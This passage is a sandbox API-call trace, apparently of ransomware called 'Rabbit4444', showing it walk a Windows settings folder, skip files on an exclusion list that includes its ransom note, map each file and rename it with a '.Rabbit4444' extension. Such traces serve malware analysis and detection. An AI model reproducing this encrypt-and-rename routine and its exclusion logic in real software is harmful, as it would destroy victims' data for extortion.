(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.030] lstrlenW (lpString="Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms") returned 64 [0059.030] lstrlenW (lpString="Rabbit4444") returned 10 [0059.030] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.030] lstrlenW (lpString=".dll") returned 4 [0059.030] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.030] lstrlenW (lpString=".lnk") returned 4 [0059.030] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.030] lstrlenW (lpString=".ini") returned 4 [0059.030] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.030] lstrlenW (lpString=".sys") returned 4 [0059.030] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.030] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7c3e0552-96e2-4069-ac1c-208c146683ca}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.030] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.030] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15034098347) returned 1 [0059.030] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1183) returned 1 [0059.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.030] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.030] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0059.032] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0059.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.033] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15034381339) returned 1 [0059.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.033] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.033] CloseHandle (hObject=0x298) returned 1 [0059.033] CloseHandle (hObject=0x278) returned 1 [0059.033] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms.Rabbit4444") returned 192 [0059.033] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7c3e0552-96e2-4069-ac1c-208c146683ca}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7c3e0552-96e2-4069-ac1c-208c146683ca}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.034] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x525b1a5a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x525b1a5a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", cAlternateFileName="CL5964~1.SET")) returned 1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2=".") returned 1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="..") returned 1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="windows") returned -1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="boot") returned 1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.034] lstrcmpiW (lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.034] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms" | out: lpString1="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms") returned="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms" [0059.035] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.035] lstrlenW (lpString="Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms") returned 64 [0059.035] lstrlenW (lpString="Rabbit4444") returned 10 [0059.035] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.035] lstrlenW (lpString=".dll") returned 4 [0059.035] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.035] lstrlenW (lpString=".lnk") returned 4 [0059.035] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.035] lstrlenW (lpString=".ini") returned 4 [0059.035] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.035] lstrlenW (lpString=".sys") returned 4 [0059.035] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7d13a5db-6081-48bd-8ea3-a9d7fe67a335}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.035] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.035] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15034717917) returned 1 [0059.036] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=995) returned 1 [0059.037] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.037] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0059.037] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.038] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.039] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.039] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.039] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.039] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.039] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.039] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15034973807) returned 1 [0059.039] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.039] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0059.039] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.039] CloseHandle (hObject=0x298) returned 1 [0059.039] CloseHandle (hObject=0x278) returned 1 [0059.039] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms.Rabbit4444") returned 192 [0059.039] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7d13a5db-6081-48bd-8ea3-a9d7fe67a335}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7d13a5db-6081-48bd-8ea3-a9d7fe67a335}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.040] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528ac95a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x528ac95a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x223a84da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", cAlternateFileName="CL4EAD~1.SET")) returned 1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2=".") returned 1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="..") returned 1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="windows") returned -1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="boot") returned 1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.040] lstrcmpiW (lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.040] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms" | out: lpString1="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms") returned="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms" [0059.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.041] lstrlenW (lpString="Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms") returned 64 [0059.041] lstrlenW (lpString="Rabbit4444") returned 10 [0059.041] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.041] lstrlenW (lpString=".dll") returned 4 [0059.041] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.041] lstrlenW (lpString=".lnk") returned 4 [0059.041] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.041] lstrlenW (lpString=".ini") returned 4 [0059.041] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.041] lstrlenW (lpString=".sys") returned 4 [0059.041] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.041] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7de6cf7c-b699-421b-a808-139e798e6c64}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.041] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.041] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15035213651) returned 1 [0059.041] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1105) returned 1 [0059.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.042] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.042] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0059.043] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0059.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.044] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15035462372) returned 1 [0059.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.044] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.044] CloseHandle (hObject=0x298) returned 1 [0059.044] CloseHandle (hObject=0x278) returned 1 [0059.044] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms.Rabbit4444") returned 192 [0059.044] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7de6cf7c-b699-421b-a808-139e798e6c64}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7de6cf7c-b699-421b-a808-139e798e6c64}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.045] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5296b537, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5296b537, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", cAlternateFileName="CL9037~1.SET")) returned 1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2=".") returned 1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="..") returned 1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="windows") returned -1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="boot") returned 1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.045] lstrcmpiW (lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.045] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms" | out: lpString1="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms") returned="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms" [0059.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.046] lstrlenW (lpString="Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms") returned 64 [0059.046] lstrlenW (lpString="Rabbit4444") returned 10 [0059.046] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.046] lstrlenW (lpString=".dll") returned 4 [0059.046] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.046] lstrlenW (lpString=".lnk") returned 4 [0059.046] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.046] lstrlenW (lpString=".ini") returned 4 [0059.046] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.046] lstrlenW (lpString=".sys") returned 4 [0059.046] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.046] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7e5bc096-f558-419a-9326-bc6414d592c3}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.046] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.046] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15035712063) returned 1 [0059.046] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1022) returned 1 [0059.046] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.047] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0059.047] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x298 [0059.048] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x70000 [0059.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.049] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.049] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15035977741) returned 1 [0059.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 